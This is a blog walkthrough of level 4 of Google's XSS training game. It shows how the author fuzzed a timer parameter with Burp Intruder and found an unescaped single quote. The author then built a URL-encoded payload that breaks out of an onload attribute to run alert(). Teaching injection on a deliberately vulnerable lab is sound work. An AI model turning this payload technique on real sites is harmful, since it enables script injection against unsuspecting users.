It has been a long time since I have put up a post so it needs to be a decent one :-) and what better way than to explain the methodology that I used whilst solving the google Hacking Challenge #4. I did use all of the hints as I was really stumped as to what to do. Anyway below is my methodology.
So when looking at any XSS challenge you should have the following
- An interception proxy
- A browser which will not filter out your XSS and;
- A JS console ( I use Firebug).
Without going into details about correct encoding it is safe to say that when non alphanumeric chars are properly escaped i.e " is " and <> are < and > then it is harder to inject JS.
Step 1: Find out where our string is injected in the source code
I injected a 'ZZ' this is
fairly
obvious to find. So it looks like it is injected into startTimer and
the divid 'message. We are more interested in the onload function as
this is JS.
Step 2:Check what non alphanumeric characters are being encoded.
Open up python and type the following to grab all the nonalphanumeric chars.
Each line of code does the following.
#Import Strings Module
#Create a file to write to
#Splice the printable chars so you only have the nonalphanumeric characters then iterate through each.
#Write each character to file including a new line after each.
#Close the file after writing.
>>> import string
>>> fdesc = open("nonalphanumeric.txt", "w")
for i in string.printable[62:94]:
... fdesc.write(i + "\n")
...
...
>>> fdesc.close()
You should now have a file that you can test with to see what chars are being encoded. Keep in a safe spot for future tests ;).
Run burp intruder, load the file and fuzz the 'timer' param.
If your response contains something like this '' ' then the character is being encoded in HTML format and the browser will correctly render
it (this is a hint that Google provides).
After running burpsuite through all
of the chars I noticed that the single quote was not being encoded correctly. Here is the html response after injecting a single
quote '
<!doctype html>
<html>
<head>
<!-- Internal
game scripts/styles, mostly boring stuff -->
<script
src="/static/game-frame.js"></script>
<link
rel="stylesheet" href="/static/game-frame-styles.css" />
<script>
function
startTimer(seconds) {
seconds =
parseInt(seconds) || 3;
setTimeout(function() {
window.confirm("Time is up!");
window.history.back();
}, seconds *
1000);
}
</script>
</head>
<body
id="level4">
<img
src="/static/logos/level4.png" />
<br>
<img
src="/static/loading.gif" onload="startTimer(''');"
/>
<br>
<div
id="message">Your timer will execute in '
seconds.</div>
</body>
</html>
So I reran the request in the browser whilst the Firebug console was open to see if any error messages were logged.
This is a sign that the single quote was injected and parsed as JS. So where to next?
Open up the console and type the following to get the startTimer function in for you to muck around with. Make sure you click 'Run'
If you passed no value to the timer param i.e . http://xss-game.appspot.com/level4/frame?timer= you would have the following startTimer script in sourcecode.
startTimer(' ')
How do we create an attack. Create two JS calls in one. Bolded is what I typed.
startTimer('1');alert('1')
Execute and you get your alert.
Now we need to add this to the timer param for it to
execute.
http://xss-game.appspot.com/level4/frame?timer=1');alert('1')
But it seems to not work as all chars after the ';' are
removed.
How do we solve this? We URL encode the non alpha-numeric
chars so the attack string looks like this.
timer=1%27)%3balert(%27xss
In the source code we get the following.
<img src="/static/loading.gif"
onload="startTimer('1');alert('xss');" />
Boom XSS
Now copy the following string into the address bar and you will pass challenge 4.
http://xss-game.appspot.com/level4/frame?timer=1%27)%3balert(%27xss
Hopefully this has been informative for you :). Hack responsibly, if you have a hacking addiction please phone the help line. 1800 CNTSTPHACKING
No comments:
Post a Comment